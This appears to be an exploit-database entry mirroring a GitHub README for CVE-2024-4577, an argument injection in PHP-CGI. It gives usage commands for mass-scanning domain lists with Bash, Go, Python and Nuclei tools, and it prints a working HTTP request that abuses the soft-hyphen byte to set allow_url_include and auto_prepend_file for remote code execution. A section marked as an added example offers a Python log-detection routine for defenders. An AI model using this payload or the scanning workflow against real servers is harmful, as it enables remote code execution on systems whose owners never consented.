Exploit for OS Command Injection in Php

Vulnerability Details

Basic Information

Title Exploit for OS Command Injection in Php
Type githubexploit
Published 2025-04-20T22:33:39
Last Seen 2025-04-21T06:03:59
CVSS Score 9.8 (CRITICAL)

CVSS v3 Details

Attack Vector NETWORK
Attack Complexity LOW
Privileges Required NONE
User Interaction NONE
Scope UNCHANGED
Confidentiality Impact HIGH
Integrity Impact HIGH
Availability Impact HIGH

CVE Information

CVE IDs CVE-2024-4577
CWE
Bulletin Family exploit

Description

# PHP RCE PoC
## CVE-2024-4577: Argument Injection in PHP-CGI

## Overview

This repository contains scripts to check for the CVE-2024-4577 vulnerability, an argument injection issue in PHP-CGI. You can use the provided Bash, Go, and Python scripts to test a list of domains for this vulnerability. I’ve also released a Nuclei YAML file.

## Usage

### Bash Script

To use the Bash script, run the following command:

```bash
./CVE-2024-4577.sh /path/to/domains-list
```

### Go Script

First, save the Go script to a file named `CVE-2024-4577.go`. To build and run the Go script:

1. Compile the Go script into a binary:

```bash
go build -o CVE-2024-4577 CVE-2024-4577.go
```

2. Execute the binary with the domain list file as an argument:

```bash
./CVE-2024-4577 /path/to/domains-list
```

### Python Script

First, save the Python script to a file named `CVE-2024-4577.py`. To run the Python script:

1. Ensure you have the `requests` library installed:

```bash
pip install requests
```

2. Execute the Python script with the domain list file as an argument:

```bash
python CVE-2024-4577.py /path/to/domains-list
```

3. (Optional) If you want to only print vulnerable hosts:

```bash
python CVE-2024-4577.py /path/to/domains-list --quiet
```

## Proof of Concept (POC) Explained

To manually test for the vulnerability, you can send the following POST request:

```http
POST /test.hello?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
Accept: */*
Content-Length: 23
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive


```
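
For defenders, the request above leaves a recognizable trace in web server access logs: `+`-separated query-string arguments that begin with the byte `%AD`. The following Python detection is an added example, not part of this repository; the log lines are constructed, and it assumes a combined-log style format in which the server records the request target still percent-encoded.

```python
import re
from urllib.parse import unquote_to_bytes

# Constructed access-log lines (combined-log style), not real traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [21/Apr/2025:06:01:12 +0000] "POST /test.hello'
    '?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input'
    ' HTTP/1.1" 200 512',
    '198.51.100.7 - - [21/Apr/2025:06:02:40 +0000] '
    '"GET /index.php?id=42&name=caf%C3%A9 HTTP/1.1" 200 1024',
    '203.0.113.9 - - [21/Apr/2025:06:03:01 +0000] '
    '"GET /index.php?%add+allow_url_include%3D1 HTTP/1.1" 404 0',
    # UTF-8 soft hyphen (C2 AD) inside a search term: benign, must not alert.
    '198.51.100.8 - - [21/Apr/2025:06:04:00 +0000] '
    '"GET /search?q=co%C2%ADoperate HTTP/1.1" 200 300',
]

REQUEST_RE = re.compile(r'^(\S+) .*?"[A-Z]+ (\S+) HTTP/[\d.]+"')
# ini directives set by the request shown above.
WATCHED = (b"allow_url_include", b"auto_prepend_file")


def injected_args(target):
    """Return the '+'-separated query tokens that start with byte 0xAD."""
    query = target.partition("?")[2]
    # CGI splits command-line style query strings on '+'.
    tokens = [unquote_to_bytes(t) for t in query.split("+")]
    return [t for t in tokens if t.startswith(b"\xad")]


def scan(lines):
    """Return (client, path, n_injected_args, directives) per suspicious line."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line we can parse
        client, target = m.groups()
        args = injected_args(target)
        if not args:
            continue
        path, _, query = target.partition("?")
        decoded = unquote_to_bytes(query).lower()
        seen = [d.decode() for d in WATCHED if d in decoded]
        hits.append((client, path, len(args), seen))
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Matching on the decoded leading byte rather than the literal string `%AD` catches the lowercase `%ad` form as well, while the UTF-8 soft hyphen inside an ordinary search term is ignored.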

## Nuclei Template
I’ve also created a Nuclei template to scan for vulnerable instances. It uses the v3 layout scheme and has been tested in a lab environment:
```
nuclei -t CVE-2024-4577.yaml -u
```

## Domain List Example
Each entry in the domain list should be prefixed with `http://` or `https://` so that it is read correctly.

```
http://example.com
http://testsite.com
http://vulnerablesite.com
```

## Example Output

If a domain is found to be vulnerable, the output will be:

```
http://example.com: Vulnerable
http://vulnerablesite.com: Vulnerable
```

Impact Assessment

Base Score 9.8
Severity CRITICAL
